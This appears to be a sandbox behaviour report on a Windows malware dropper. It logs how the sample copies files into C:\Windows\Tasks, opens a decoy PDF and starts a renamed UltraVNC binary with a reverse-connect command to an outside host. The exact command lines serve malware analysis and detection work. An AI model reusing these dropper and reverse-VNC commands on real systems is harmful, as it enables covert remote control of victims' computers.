                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040385E
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DC9
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Downloads\Lom.pdfJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
                          Source: C:\Windows\Tasks\sync_browser.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
                          Source: Olz7TmvkEW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\timeout.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile read: C:\Users\user\Desktop\Olz7TmvkEW.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\Olz7TmvkEW.exe "C:\Users\user\Desktop\Olz7TmvkEW.exe"
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1568,i,8224876914064960340,8194205702827527936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmdJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1568,i,8224876914064960340,8194205702827527936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: apphelp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: sspicli.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winsta.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wldp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLL
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: Olz7TmvkEW.exeStatic file information: File size 1641047 > 1048576
                          Source: Binary string: conhost.pdbUGP source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe.7.dr, sdABZ4.E1924R.3.dr, sdABZ4.E1924R.0.dr
                          Source: Binary string: conhost.pdb source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe.7.dr, sdABZ4.E1924R.3.dr, sdABZ4.E1924R.0.dr
                          Source: sdABZ4.E1924R.0.drStatic PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: Olz7TmvkEW.exeStatic PE information: real checksum: 0x2af97 should be: 0x198e1b
                          Source: sdABZ4.E1924R.0.drStatic PE information: section name: .didat
                          Source: sdABZ4.E1924R.3.drStatic PE information: section name: .didat
                          Source: conhost.exe.7.drStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00413660 push eax; ret 0_2_0041368E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593FEF1 push rcx; ret 21_2_00007FF7D593FEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59507F8 push rbp; iretd 21_2_00007FF7D59507F9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59512EF push rbp; iretd 21_2_00007FF7D59512F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5968CF9 push 8B481074h; iretd 21_2_00007FF7D5968CFF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594DC21 push rsp; ret 21_2_00007FF7D594DC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5951400 push rbp; iretd 21_2_00007FF7D5951401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594DC01 push rcx; ret 21_2_00007FF7D594DC02
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594DC11 push rax; ret 21_2_00007FF7D594DC13
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593FEF1 push rcx; ret 26_2_00007FF7D593FEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59507F8 push rbp; iretd 26_2_00007FF7D59507F9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59512EF push rbp; iretd 26_2_00007FF7D59512F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5968CF9 push 8B481074h; iretd 26_2_00007FF7D5968CFF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594DC21 push rsp; ret 26_2_00007FF7D594DC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5951400 push rbp; iretd 26_2_00007FF7D5951401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594DC01 push rcx; ret 26_2_00007FF7D594DC02
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594DC11 push rax; ret 26_2_00007FF7D594DC13

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924RJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sdABZ4.E1924RJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sdABZ4.E1924RJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\gTFLK1.jBd3EiJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924RJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\gTFLK1.jBd3EiJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sdABZ4.E1924RJump to dropped file
                          Source: GIjul8.QTIrrr.3.drBinary or memory string: bcdedit.exe
